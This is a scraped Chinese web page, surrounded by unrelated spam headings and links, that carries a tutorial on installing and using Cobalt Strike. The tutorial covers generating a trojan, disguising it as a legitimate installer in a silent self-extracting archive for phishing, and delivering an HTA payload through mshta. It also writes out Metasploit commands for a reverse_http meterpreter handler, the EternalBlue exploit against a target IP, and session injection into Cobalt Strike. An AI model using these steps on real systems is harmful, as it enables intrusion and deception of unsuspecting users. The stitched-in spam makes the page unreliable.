当前位置: 首页 > news >正文

有哪些官方网站做的比较好昆山网站建设义搏

有哪些官方网站做的比较好,昆山网站建设义搏,一个企业可以做几个网站,上海网站建设褐公洲司目录 CobaltStrike简介 主要功能#xff1a; 使用注意#xff1a; 在使用CobaltStrike进行渗透测试时#xff0c;务必遵守法律法规#xff0c;并获得合法授权。 CobaltStrike安装 前提 安装 服务端安装 windows安装 CS基本使用 监听器配置 一些基本的攻击…目录 CobaltStrike简介 主要功能 使用注意        在使用CobaltStrike进行渗透测试时务必遵守法律法规并获得合法授权。 CobaltStrike安装 前提 安装 服务端安装 windows安装 CS基本使用 监听器配置 一些基本的攻击 生成木马靶机上线此次演示木马生成在自己的电脑上然后双击启动木马 ​编辑 木马的伪装自解压安装包设置 生成hta文件靶机上线 CS和MSF联动 CS会话传递到MSF上 设置外部监听器 配置msfmsf运行之后会获取会话 设置监听转移选择外部监听器 结果 msf会话传递至CS上 首先先利用msf上线一台靶机 cs设置监听 msf设置派生 结果 CobaltStrike简介 CobaltStrike简称CS是一款专业的团队作战渗透测试工具包含客户端和服务端两个部分。以下是关于CobaltStrike的简单介绍 主要功能 持久化、横向移动在已经取得攻击目标控制权后CobaltStrike能够用于在目标系统中保持长期存在并进行横向移动扩大攻击范围。 流量隐藏通过其独特的技术手段CobaltStrike可以有效地隐藏网络流量使攻击行为难以被检测和追踪。 数据窃取CobaltStrike还具备数据窃取能力能够从目标系统中提取敏感信息。 使用注意         在使用CobaltStrike进行渗透测试时务必遵守法律法规并获得合法授权。 CobaltStrike安装 前提 在安装CobaltStrike时设备上需要部署jdk8以上的环境 安装 服务端安装在kali或者云服务器上客户端安装在Windows上 服务端安装 下列演示为在kali中安装 将CobaltStrike安装包中服务端拖进kali中 在kali桌面文件夹中找到CobaltStrike以下统称CS找到teamserver文件修改文件权限为文件添加执行权限 chmod x teamserver 执行该文件 ./teamserver 本机ip地址 自己设置的密码 后面会出现如下图所示界面 windows安装 打开CS的客户端点击如下图框起来的地方 开始会有如下弹窗 之后会有如下弹窗下列弹窗中Host填写Server端 IP地址Port设置为服务端设置端口Password设置服务端中设置密码User自己随意设置然后点击连接 然后就会出现如下图所示图片 这样就安装成功了 CS基本使用 监听器配置 在CS客户端中点击如下图所示图案 添加会话 一些基本的攻击 生成木马靶机上线此次演示木马生成在自己的电脑上然后双击启动木马 木马也可以配合钓鱼攻击生成连接诱导被攻击点击 选择创建位置 测试是否成功下列图片测试成功的图片可以打开机器的文件目录并且对其进行操作 木马的伪装自解压安装包设置 选择一个木马程序和一个常用的软件使用winrar软件进行压缩选择自解压压缩格式选择的这个格式可以让后缀变为exe 点击高级,选择自解压选项 选择解压路径,是一个别人都能访问的路径 ,windows所有人都有的路径就是C:UsersPublic 按照下图设置解压方式 选择解压方式静默解压 选择更新模式和覆盖模式 设置图标 然后点击确定就可以了然后再修改一下文件名称他会生成一个如下图所示文件上面的是正版下面的是盗版。是不是很像 上述步骤出来的自解压安装包是会被杀毒软件发现的。如果上述安装包再配合一些其他黑客技术就可以进行一些。。。 生成hta文件靶机上线 点击生成hta文件 设置监听和脚本语言 设置监听端口 设置监听端口和hta文件 设置完成后会给你一串网址 复制地址在靶机上使用mshta进行运行 靶机上线成功 上线之后就可以提权进行下一步渗透了 CS和MSF联动 CS会话传递到MSF上 设置外部监听器 配置msfmsf运行之后会获取会话 msf6 use exploit/multi/handler#下面代码与你在CS中配置有关#payload对应外部监听的payloadlhost配置的是本地地址lpost要和监听器相同msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_httpmsf6 exploit(multi/handler) set lhost 192.168.244.141msf6 exploit(multi/handler) set lport 8085 设置监听转移选择外部监听器 结果 会话成功转移到了msf上 msf会话传递至CS上 首先先利用msf上线一台靶机 这里用的是永恒之蓝漏洞上线的一台windows7靶机 msf6 use exploit/windows/smb/ms17_010_eternalblue #设置攻击主机 msf6 exploit(windows/smb/ms17_010_eternalblue) set rhosts 192.168.244.146 #设置监听端口 msf6 exploit(windows/smb/ms17_010_eternalblue) set lport 8081 #攻击 msf6 exploit(windows/smb/ms17_010_eternalblue) run cs设置监听 msf设置派生 在MSF中exploit/windows/local/payload_inject 模块通常用于在已经获得Windows系统shell访问权限的情况下向该系统的另一个进程注入一个payload。 #使用该模块可以将 Metasploit 获取到的会话注入到CS中 use exploit/windows/local/payload_inject #和cs监听器保持一致 set payload windows/meterpreter/reverse_http #可以不设置但是端口不要和CS冲突了。 set prependmigrate true # msf所在主机IP set lhost xxxx #CS上的listen端口 set lport XXX #要转发的session set session 2 run 结果 会话已被cs获取
http://www.hkea.cn/news/14521894/

相关文章:

  • 宜昌市建设厅官方网站安庆集团网站建设
  • 网站后台管理图片水印怎么做网页设计与制作难不难
  • 怎么分析网站的外链建设情况教育网站赏析
  • 制作一个网站的费用如何建设网站 知乎
  • 瑞安市网站建设网站搭建心得体会
  • 做任务的网站有那些成都网站托管外包
  • 熊猫头表情包制作网站移动网站自助制作
  • php开发网站项目心得抖音代运营合作
  • 关于网站建设交易流程的描述一句话手机微网站尺寸
  • 不用登录的小游戏网站做网站网页维护手机App开发
  • 上饶建设网站河北软件开发网站建设
  • 东莞网站的制作设计wordpress 5 开发
  • 高端开发网站系统wordpress 回复显示
  • 做旅行社网站网页设计图片位置
  • 厦门网站排名优化费用wordpress分享型主题模板下载
  • 苏州市建设局安监站网站中铁二局深圳公司官网
  • 网站怎么申请微博登录微信小程序怎么制作流程
  • 网站登录页面模板空壳网站清理
  • 做网站就业要会什么东莞疾控中心最新通知
  • 做网站的网站犯法吗网站开发ipv6升级
  • 什么网站可以做产品入驻物流企业网站建设方案
  • 网站seo顾问品牌建设运营方案
  • 惠州市建设局人员备案网站360建站系统
  • 专业做设计的网站网站建设平台协议书
  • python做的网站哪些做结构图用什么网站
  • 网站建设代码怎么写哪个公司网络信号最好
  • 做网站总结与体会济南网站建设公司晟创未来
  • 网站站点创建成功是什么意思网站建设中的html页面下载
  • 大气婚庆网站源码项目管理软件应用
  • 建网站的公司南京doku做网站